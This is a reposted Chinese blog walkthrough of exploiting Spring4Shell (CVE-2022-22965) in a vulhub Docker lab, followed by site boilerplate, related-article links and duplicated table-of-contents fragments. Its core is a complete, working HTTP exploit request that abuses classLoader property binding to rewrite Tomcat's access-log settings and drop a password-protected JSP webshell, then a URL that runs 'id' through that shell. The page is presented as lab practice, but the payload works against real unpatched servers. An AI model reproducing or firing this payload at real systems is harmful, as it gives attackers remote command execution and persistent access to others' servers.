Java 框架安全：Spring 漏洞序列.（CVE-2022-22965）

news2024/11/28 18:45:35

什么叫 Spring 框架.

Spring 框架是一个用于构建企业级应用程序的开源框架。它提供了一种全面的编程和配置模型，可以简化应用程序的开发过程。Spring 框架的核心特性包括依赖注入（Dependency Injection）、面向切面编程（Aspect-Oriented Programming）、声明式事务管理（Declarative Transaction Management）等。依赖注入是 Spring 框架的核心概念之一，它通过将对象之间的依赖关系外部化，使得对象之间的协作更加灵活和可测试。Spring 框架提供了多种方式来实现依赖注入，包括构造函数注入、Setter 方法注入和字段注入。

开启漏洞靶场：

Web安全：iwebsec || vulhub 靶场搭建.（各种漏洞环境集合，一键搭建漏洞测试靶场）_iwebsec靶场-CSDN博客

（1）查看目录：

（1）cd vulhub
 
（2）ls

（2）启用 vulhub 漏洞：

（1）cd spring                     // 切换到对应的漏洞目录.
 
（2）cd CVE-2022-22965              // 切换到对应的漏洞版本.

（3）docker-compose build           // 建立容器

（4）docker-compose up -d           //   启用漏洞环境.

（3）进行浏览：主机的 8080 端口.

进行漏洞测试：

第一步：设置代理服务器

（1）设置代理服务器（我用的是：OWASP浏览器，也可以用别的浏览器设置代理服务器就行）

（2）新建代理服务器，选择手动代理设置127.0.0.1（为本地的IP地址），设置代理的端口8080

（3）使用刚刚设置的代理.

第二步：执行进行抓包.

（1）打开Burp，点击代理设置监听的IP地址和端口（就是刚刚浏览器设置的代理，127.0.0.1（是本地的IP地址），8080（是监听的端口））

（2）进行访问漏洞的链接.（使用 Burp 抓包.）

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.32.132:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 	AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 		Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

第三步：进行漏洞测试.

（1）访问刚才上传的 JSP webshell，并执行任意命令.

http://172.16.10.19:8080/tomcatwar.jsp?pwd=j&cmd=id

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1650074.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

Java 框架安全：Spring 漏洞序列.（CVE-2022-22965）

什么叫 Spring 框架.

目录：

开启漏洞靶场：

（1）查看目录：

（2）启用 vulhub 漏洞：

（3）进行浏览：主机的 8080 端口.

进行漏洞测试：

第一步：设置代理服务器

（1）设置代理服务器（我用的是：OWASP浏览器，也可以用别的浏览器设置代理服务器就行）

（2）新建代理服务器，选择手动代理设置127.0.0.1（为本地的IP地址），设置代理的端口8080

（3）使用刚刚设置的代理.

第二步：执行进行抓包.

（1）打开Burp，点击代理设置监听的IP地址和端口（就是刚刚浏览器设置的代理，127.0.0.1（是本地的IP地址），8080（是监听的端口））

第三步：进行漏洞测试.

相关文章

【网络编程】http协议

数据结构之链表深度讲解

Meta最新研究: Flash Attention 为何是系统性能瓶颈?

2024-05-07 商业分析-赚钱之前怎么预估风险-记录

腾讯云服务器之ssh远程连接登录

2024年荆州中级工程师报名开始了吗？

太原理工大学Python数据分析原理与应用(课外考题:8~11章)

常用算法汇总

TCP经典异常问题探讨与解决

AIGC技术带给我们什么？基于AIGC原理及其技术更迭的思考

【刷题篇】双指针（一）

【机器学习系统的构建】从模型开发的过程讲清楚K-Fold 交叉验证 (Cross-Validation)的原理和应用

Windows系统和unbtun系统连接usb 3.0海康可见MVS和红外艾睿相机

第三节课，前端

机器学习算法--朴素贝叶斯(Naive Bayes)

25考研英语长难句Day02

【进程终止】概念理解 | 三种情况 | 退出码

Map集合的实现类~HashMap

Android 系统启动流程源码分析

每日OJ题_贪心算法三⑤_力扣134. 加油站

Java 框架安全：Spring 漏洞序列.（CVE-2022-22965）

什么叫 Spring 框架.

目录：

开启 漏洞 靶场：

（1）查看目录：

（2）启用 vulhub 漏洞：

（3）进行浏览：主机的 8080 端口.

进行 漏洞 测试：

第一步：设置代理服务器

（1）设置代理服务器（我用的是：OWASP浏览器，也可以用别的浏览器 设置代理服务器就行）

（2） 新建代理服务器，选择手动代理 设置127.0.0.1（为本地的IP地址），设置代理的端口8080

（3）使用 刚刚设置的代理.

第二步：执行进行抓包.

（1）打开Burp，点击代理 设置监听的IP地址和端口（就是刚刚浏览器设置的代理，127.0.0.1（是本地的IP地址），8080（是监听的端口））

第三步：进行漏洞测试.

相关文章

开启漏洞靶场：

进行漏洞测试：

（1）设置代理服务器（我用的是：OWASP浏览器，也可以用别的浏览器设置代理服务器就行）

（2）新建代理服务器，选择手动代理设置127.0.0.1（为本地的IP地址），设置代理的端口8080

（3）使用刚刚设置的代理.

（1）打开Burp，点击代理设置监听的IP地址和端口（就是刚刚浏览器设置的代理，127.0.0.1（是本地的IP地址），8080（是监听的端口））